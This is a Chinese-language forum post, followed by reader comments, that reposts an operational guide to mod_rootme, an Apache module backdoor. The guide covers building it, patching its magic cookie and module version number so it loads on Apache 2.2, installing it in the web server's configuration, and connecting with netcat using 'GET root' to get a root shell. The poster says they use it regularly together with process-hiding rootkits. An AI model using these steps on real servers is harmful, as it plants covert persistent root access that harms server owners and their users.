linux rootkit apache mod_rootme 端口复用
没办法又开放封号了。。就转发下这后门我一直在用这挺不错的。。配合其他的rootkit来隐藏进程(sk13,LKM rootkit)
这是一个apache的模块化后门,以 pipe 的方式获得 shell,支持 tty,但是进程不能隐藏
首先看一下该rootkit的结构
root@bt:~/Tmp# ls
mod_rootme-0.4.tar.gz
root@bt:~/Tmp# tar -zxvf mod*tar.gz
mod_rootme-0.4/
mod_rootme-0.4/mrm_client.c
mod_rootme-0.4/mod_rootme.c
mod_rootme-0.4/httpd13.h
mod_rootme-0.4/Makefile32
mod_rootme-0.4/mod_rootme22.c
mod_rootme-0.4/mod_rootme2.c
mod_rootme-0.4/client.exe
mod_rootme-0.4/mrm_server.h
mod_rootme-0.4/Makefile
mod_rootme-0.4/httpd20.h
mod_rootme-0.4/README.txt
mod_rootme-0.4/httpd22.h
root@bt:~/Tmp# ls
mod_rootme-0.4 mod_rootme-0.4.tar.gz
root@bt:~/Tmp# cd mod*
root@bt:~/Tmp/mod_rootme-0.4# ls
client.exe httpd20.h Makefile mod_rootme22.c mod_rootme.c mrm_server.h
httpd13.h httpd22.h Makefile32 mod_rootme2.c mrm_client.c README.txt
root@bt:~/Tmp/mod_rootme-0.4#
看一下README.txt文件
mod_rootme: making Apache almost as insecure as IIS 5
What’s new in v0.4
——————
* added support for Apache 2.2.x
* Added Makefile32 that compiles 32-bit, meant for use on 64-bit
systems. (Linux only, because I haven’t tested it elsewhere)
What’s new in v0.3
——————
* fully functionnal shell with ssh-like pty support.
* ported to more unix flavors (*BSD, SunOS, OSF, etc.)
* client/server code and apache headers cleanup.
What’s new in v0.2
——————
* added full support for Apache 2.0.x
* added AP13/EAPI magic cookie support.
* master process properly exits when the
apache server is shutting down.
Installing mod_rootme
———————
Note: when starting apache, if you get the message
“mod_rootme.so uses plain Apache 1.3 API, this module
might crash under EAPI!”, you have to edit mod_rootme.c
and replace COOKIE_AP13 with COOKIE_EAPI.
-=[ Target: Apache 1.3.x (Debian) ]=-
# make <system>
# cp mod_rootme.so /usr/lib/apache/1.3/
# vi /etc/apache/httpd.conf (or modules.conf)
[...]
LoadModule rootme_module /usr/lib/apache/1.3/mod_rootme.so
# apachectl restart
-=[ Target: Apache 1.3.x (local ) ]=-
# make <system>
# cp mod_rootme.so /usr/local/apache/libexec/
# vi /usr/local/apache/conf/httpd.conf
[...]
LoadModule rootme_module libexec/mod_rootme.so
[...]
AddModule mod_rootme.c
# /usr/local/apache/bin/apachectl restart
-=[ Target: Apache 2.0.x (Debian) ]=-
# make <system>
# cp mod_rootme2.so /usr/lib/apache2/modules/
# cat > /etc/apache2/mods-enabled/rootme2.load
LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so
^D
# apache2ctl stop; apache2ctl start
-=[ Target: Apache 2.0.x (local ) ]=-
# make <system>
# cp mod_rootme2.so /usr/local/apache2/modules/
# vi /usr/local/apache2/conf/httpd.conf
[...]
LoadModule rootme2_module modules/mod_rootme2.so
# PATH=/usr/local/apache2/bin:$PATH; export PATH
# apachectl stop; apachectl start
-=[ Target: Apache 2.2.x (Debian) ]=-
# make <system>
# cp mod_rootme22.so /usr/lib/apache2/modules/
# cat > /etc/apache2/mods-enabled/rootme22.load
LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme22.so
^D
# apache2ctl stop; apache2ctl start
-=[ Target: Apache 2.2.x (local ) ]=-
# make <system>
# cp mod_rootme22.so /usr/local/apache2/modules/
# vi /usr/local/apache2/conf/httpd.conf
[...]
LoadModule rootme2_module modules/mod_rootme22.so
# PATH=/usr/local/apache2/bin:$PATH; export PATH
# apachectl stop; apachectl start
Using mod_rootme
—————-
Make sure you have netcat installed on your system
(the telnet client will not work for this purpose)
$ nc 192.168.2.20 80
GET root
rootme-0.3 ready
id
uid=0(root) gid=1(other)
uname -a
SunOS atlas 5.8 Generic_108528-07 sun4u sparc SUNW,UltraAX-i2
stty
stty: : Invalid argument
exit
You can also use the bundled client to get a somewhat
more comfortable rootshell:
./client 192.168.2.20
rootme-0.3 ready
root@atlas:~ # ps
PID TTY TIME CMD
2314 pts/2 0:00 bash
2316 pts/2 0:00 ps
root@atlas:~ # stty
speed 9600 baud; -parity
rows = 25; columns = 80; ypixels = 0; xpixels = 0;
swtch = <undef>;
brkint -inpck -istrip icrnl -ixany imaxbel onlcr tab3
echo echoe echok echoctl echoke iexten
root@atlas:~ # exit
To run the prebuilt client.exe you’ll need cygwin1.dll from
http://www.cygwin.com or http://devine.nerim.net/cygwin1.dll
先做好安装前情报搜集工作
Debian系的apache配置文件:
/etc/apache2/apache2.conf
/etc/apache2/ports.conf
查看apache的版本号:
root@bt:/etc/apache2# apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built: Nov 6 2012 20:40:59
debian系的apache模块路径:
root@bt:/usr/lib/apache2/modules# ls
httpd.exp mod_authn_dbd.so mod_authz_owner.so mod_dav_lock.so mod_ext_filter.so mod_log_forensic.so mod_proxy_http.so mod_substitute.so
libphp5.so mod_authn_dbm.so mod_authz_user.so mod_dav.so mod_file_cache.so mod_mem_cache.so mod_proxy_scgi.so mod_suexec.so
mod_actions.so mod_authn_default.so mod_autoindex.so mod_dbd.so mod_filter.so mod_mime_magic.so mod_proxy.so mod_unique_id.so
mod_alias.so mod_authn_file.so mod_cache.so mod_deflate.so mod_headers.so mod_mime.so mod_reqtimeout.so mod_userdir.so
mod_asis.so mod_authnz_ldap.so mod_cern_meta.so mod_dir.so mod_ident.so mod_negotiation.so mod_rewrite.so mod_usertrack.so
mod_auth_basic.so mod_authz_dbm.so mod_cgid.so mod_disk_cache.so mod_imagemap.so mod_proxy_ajp.so mod_setenvif.so mod_version.so
mod_auth_digest.so mod_authz_default.so mod_cgi.so mod_dumpio.so mod_include.so mod_proxy_balancer.so mod_speling.so mod_vhost_alias.so
mod_authn_alias.so mod_authz_groupfile.so mod_charset_lite.so mod_env.so mod_info.so mod_proxy_connect.so mod_ssl.so
mod_authn_anon.so mod_authz_host.so mod_dav_fs.so mod_expires.so mod_ldap.so mod_proxy_ftp.so mod_status.so
这个rootkit在apache 2.2.*会报错
问题好像是magic字段引起的
在真正激活模块之前,Apache会检查所加载的模块是否为真正的Apache模块, 这个检测是通过检查module结构体中的magic字段实现的。 而magic字段是通过宏STANDARD20_MODULE_STUFF体现,在这个宏中magic的值为MODULE_MAGIC_COOKIE, MODULE_MAGIC_COOKIE定义如下:
1 #define MODULE_MAGIC_COOKIE 0x41503232UL /* "AP22" */
找到httpd22.h
将:
#define MODULE_MAGIC_COOKIE 0x41503230UL
改为:
#define MODULE_MAGIC_COOKIE 0x41503232UL
接下来编译一下:
root@bt:~/Tmp/mod_rootme-0.4# make linux
gcc -s -fPIC -shared mod_rootme.c -o mod_rootme.so -lutil -DLINUX
gcc -s -fPIC -shared mod_rootme2.c -o mod_rootme2.so -lutil -DLINUX
gcc -s -fPIC -shared mod_rootme22.c -o mod_rootme22.so -lutil -DLINUX
gcc -s mrm_client.c -o client
root@bt:~/Tmp/mod_rootme-0.4#
移动文件到apache2模块目录下
root@bt:~/Tmp/mod_rootme-0.4# cp mod_rootme22.so /usr/lib/apache2/modules
root@bt:~/Tmp/mod_rootme-0.4# ls /usr/lib/apache2/modules |grep mod_rootme22.so
mod_rootme22.so
root@bt:~/Tmp/mod_rootme-0.4#
修改apche配置文件:
oot@bt:/etc/apache2# ls
apache2.conf conf.d envvars httpd.conf magic mods-available mods-enabled ports.conf sites-available sites-enabled
root@bt:/etc/apache2# cp apache2.conf apache2.conf.bak
root@bt:/etc/apache2# ls
apache2.conf apache2.conf.bak conf.d envvars httpd.conf magic mods-available mods-enabled ports.conf sites-available sites-enabled
root@bt:/etc/apache2# gedit apache2.conf
在文件尾部添加:
LoadModule rootme22_module /usr/lib/apache2/modules/mod_rootme22.so
保存,重启httpd服务:
root@bt:/etc/apache2# /etc/init.d/apache2 restart
* Restarting web server apache2 apache2: Syntax error on line 238 of /etc/apache2/apache2.conf: Module “mod_rootme22.c” is not compatible with this version of Apache (found 20020903, need 20051115). Please contact the vendor for the correct version.
重新打开httpd22.h
将:
#define MODULE_MAGIC_NUMBER_MAJOR 20020903
改为:
#define MODULE_MAGIC_NUMBER_MAJOR 20051115
重新编译安装
如图,安装成功
启动另一台服务器:
具體參考
http://fuzzexp.org/about-mod_rootme-point-out-the-things.html
http://www.nowamagic.net/librarys/veda/detail/1293
參考文檔:
http://people.apache.org/~rpluem/patches/forcerecovery_2.2.diff
http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/include/ap_mmn.h
http://forums.devshed.com/apache-development-15/api-structure-php5-module-in-file-usr-local-apache2-modules-326634.html
http://www.nowamagic.net/librarys/veda/detail/1293
http://blog.sina.com.cn/s/blog_5546a5ad01010fyn.html
http://linux.chinaunix.net/techdoc/net/2007/10/07/969337.shtml
关于作者
评论9次
一直用这个后门
保号的表现
看起来有点麻烦。。。
端口复用的东西 稳定性是个问题
喜泪大奔,测试下!
貌似非常麻烦的样子
不明觉厉 学xi了
不是Module方式吗 怎么直接连接就root权限了 不应该是apache之类的么
太高级了。学xi了。